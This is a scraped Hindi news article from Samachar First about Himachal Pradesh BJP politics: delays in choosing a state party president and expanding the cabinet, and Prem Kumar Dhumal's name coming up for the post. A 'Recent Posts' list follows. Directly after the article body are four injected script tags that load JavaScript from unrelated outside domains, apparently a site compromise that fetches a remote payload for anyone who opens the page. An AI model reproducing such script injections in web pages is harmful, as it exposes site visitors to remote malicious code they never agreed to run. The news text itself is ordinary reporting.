संगठन में बदलाव और मंत्रिमंडल विस्तार न होना, कहीं भाजपा में नयी परेशानी न हो जाये शुरु

<p>संगठन और सरकार में&nbsp; बदलाव में देरी कहीं सरकार को भारी न पड़ जाए क्योंकि भाजपा के भीतर मंत्री बनने वालों की चाहत अब बढ़ती जा रही है। वहीं प्रदेश अध्यक्ष को लेकर भी अब धूमल के नाम से एक और बड़ी चुनौती जयराम ठाकुर के सामने आ चुकी है। हिमाचल प्रदेश भाजपा में बेशक त्रिलोक जमवाल की प्रदेश अध्यक्ष बनाने को लेकर लगभग सारी रूपरेखा संगठन की तरफ से फाइनल हो चुकी है। लेकिन इन सबके बीच में पूर्व मुख्यमंत्री और भाजपा के मास लीडर के रूप में जाने वाले प्रेम कुमार धूमल का नाम एक बार फिर अध्यक्ष पद की दौड़ में आने से भाजपा में खुशी और सन्नाटा दोनों ही चीजें नजर आने लगे हैं।</p>

<p>बताते चलें कि भाजपा में प्रेम कुमार धूमल को मास लीडर के रूप में उसी तरीके से प्रदेश की जनता देखती है। जैसे कांग्रेस पार्टी में 6 बार मुख्यमंत्री रहे वीरभद्र सिंह को यही कारण है कि धूमल का नाम चलते ही नई भाजपा जिसमें धूमल समर्थकों को पूरी तरह से दरकिनार करने का प्रयास किया जा रहा है। ये कहीं ना कहीं चुप्पी साध&nbsp; चुकी है और अंदर खाते हैं इस चर्चा को किसी भी रूप में विराम देने का प्रयास भी कर रही है। लेकिन लगातार प्रदेश अध्यक्ष की नियुक्ति को लेकर चल रही देरी अब कहीं जयराम ठाकुर की सरकार को भारी न पड़ जाए और जिस तरह से कहा जा रहा है कि अगर 2022 के चुनावों में भाजपा को प्रदेश में रिपीट होना है तो कद्दावर नेता को ही प्रदेश अध्यक्ष की जिम्मेदारी दी जा सकती है। धूमल का नाम सबसे ऊपर माना जा रहा है और जिन नामों को लेकर प्रदेश भाजपा के भीतर चर्चा चल रही है। वह नाम कहीं भी पार्टी को प्रदेश में रिपीट करवाने में सक्षम है ऐसा नजर नहीं आ रहा।</p>

<p>इससे पहले भी जब हिमाचल प्रदेश का अध्यक्ष बदलने की बात चली थी। उस समय भी पूर्व मुख्यमंत्री प्रेम कुमार धूमल का अध्यक्ष बनना तय माना जा रहा था। लेकिन सूत्र बताते हैं कि उस समय धूमल ने खुद ही इसमें रुचि नहीं दिखयी थी। इस बार भी जब उनसे इस विषय में पूछा गया तो उन्होंने कहा कि मुझे इस बारे में अधिक जानकारी नहीं है और मुझे मेरी जानकारी में भी सारा मामला मीडिया और सोशल मीडिया के माध्यम से ही आ रहा है और जो भी निर्णय होगा प्रदेश हाईकमान करेंगे और हम उनके निर्णय के साथ बंधे हुए हैं।।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1578711062788″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

उपचार के लिए क्षेत्रीय अस्पताल लाया गया विचाराधीन कैदी फरार

  UNA: जिला कारागार बनगढ़ से उपचार के लिए क्षेत्रीय अस्पताल लाया गया विचाराधीन कैदी…

1 hour ago

लापता लेडीज ऑस्कर के लिए नामांकित

  Chennai, Agencies: किरण राव की ‘लापता लेडीज’ को ऑस्कर पुरस्कार 2025 के लिए भारत…

2 hours ago

हिमाचल में किसानों को 50 प्रतिशत सब्सिडी पर 1100 में मिलेंगे साइकल-हल

  Hamirpur:  प्रदेश में किसानों को 50 प्रतिशत सब्सिडी पर साइकल-हल प्रदान किए जाएंगे। 2200…

3 hours ago

संजौली कॉलेज में SFI कार्यकर्ताओं और पुलिस बल में धक्का- मुक्की

  Shimla: 6 छात्र नेताओं के निष्कासन का मामला तूल पकड़ गया है। तनाव बढ़…

4 hours ago

कैसे मूर्ख व्यक्ति को संसद भेजा, नेगी का कंगना पर करारा जवाब

Shimla : हिमाचल के राजस्व मंत्री जगत सिंह नेगी ने कंगना पर निशाना साधा है।…

4 hours ago

सितंबर में तपे पहाड़: शिमला 29 तो ऊना, कांगड़ा, चंबा, बिलासपुर में पारा 35 के पार

  सितंबर माह में जून जैसी गर्मी का अहसास  25 रात से भारी बारिश का …

4 hours ago